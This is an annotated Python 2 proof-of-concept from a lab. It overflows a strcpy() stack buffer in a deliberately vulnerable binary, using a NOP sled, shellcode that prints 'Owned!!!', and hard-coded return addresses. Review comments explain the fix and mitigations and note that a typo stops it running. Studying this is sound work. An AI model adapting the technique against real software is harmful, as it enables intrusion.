# Author: Abhinav Thakur
# Email : compilepeace@gmail.com
# Source file : /home/student/labs/basic_vuln.c
# binary file : basic_vuln
# Description : This exploit takes advantage of the usage of strcpy() in the binary which copies the
# user input without validating the length of input. This leads to possibility of stack
# corruption
#
# Usage : ./basic_vuln $(cat basic_vuln_malacious_input)
#
# NOTE(review): this is a lab proof-of-concept against a deliberately vulnerable
# binary. The root cause it demonstrates is an unbounded strcpy() into a fixed-size
# stack buffer; the fix on the C side is a length-checked copy (strncpy/snprintf with
# an explicit bound, or rejecting over-long input). Stack canaries (-fstack-protector),
# a non-executable stack (NX) and ASLR/PIE would each break this particular payload,
# which is why the hard-coded addresses below only hold on the lab VM they were
# measured on.
#
# NOTE(review): as published the script does not run -- `shellocde` on the
# `payload += shellocde` line is a misspelling of `shellcode` and raises NameError
# before anything is written. Left as-is here; the page is documented, not repaired.
#
# NOTE(review): the payload is assembled as a text `str` and written with mode 'w';
# that only produces raw bytes under Python 2. Under Python 3 `str += bytes`
# (struct.pack returns bytes) and writing bytes to a text-mode file both raise
# TypeError, so the script assumes a Python 2 interpreter.
import struct
# Stack addresses observed in the lab (no ASLR), recorded from the debugger:
# user input: 0xbffff7a9
# main()'s local buffer: 0xbffff588
# Saved Frame pointer: 0xbffff5c8
# Return pointer : 0xbffff5cc
# Value at ebp : 0xbffff5e8
# offset to return pointer (from main()'s local buffer): 0xbffff5cc - 0xbffff588 = 0x44 = 68 bytes
#   (the original comment wrote the subtraction the other way round; the magnitude is the same)
#   The payload below matches that: 30 NOP bytes + 34 shellcode bytes + 4 bytes of saved
#   ebp = 68 bytes, so the final struct.pack lands exactly on the saved return address.
# 34 bytes of 32-bit Linux x86 code. Read byte-by-byte it is:
#   xor eax/ebx/ecx/edx; mov al,4 (write); mov bl,1 (stdout); push "d!!!"; push "Owne";
#   mov ecx,esp; mov dl,8; int 0x80; mov al,1 (exit); xor ebx,ebx; int 0x80
# i.e. write(1, "Owned!!!", 8) followed by exit(0) -- a benign marker, not a shell.
# Verify with a disassembler before relying on this reading.
shellcode = ("\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x68\x64\x21\x21\x21\x68\x4f\x77\x6e\x65\x89\xe1\xb2\x08\xcd\x80\xb0\x01\x31\xdb\xcd\x80")
# NOP sled: 30 x 0x90 so the return address need not hit the shellcode's first byte exactly.
payload = "\x90" * 30
# BUG (see header): `shellocde` is undefined; this line raises NameError.
payload += shellocde
# "I" packs a native-endian unsigned 32-bit int; on the lab's x86 box that is little-endian,
# which is what the stack layout needs. "<I" would make the intent explicit.
payload += struct.pack("I", 0xbffff5e8) # value of saved ebp
# Overwrites the saved return address. Note this value is 0x30 below the buffer address
# recorded above; presumably it accounts for a stack shift between the debugger and a
# normal run -- TODO confirm, the page does not say.
payload += struct.pack("I", 0xbffff558) # return address (somewhere on stack)
# Text-mode write of the raw payload (Python 2 semantics, see header). A `with` block
# would be the idiomatic form; left unchanged here.
fo = open('basic_vuln_malacious_input', 'w')
fo.write(payload)
fo.close()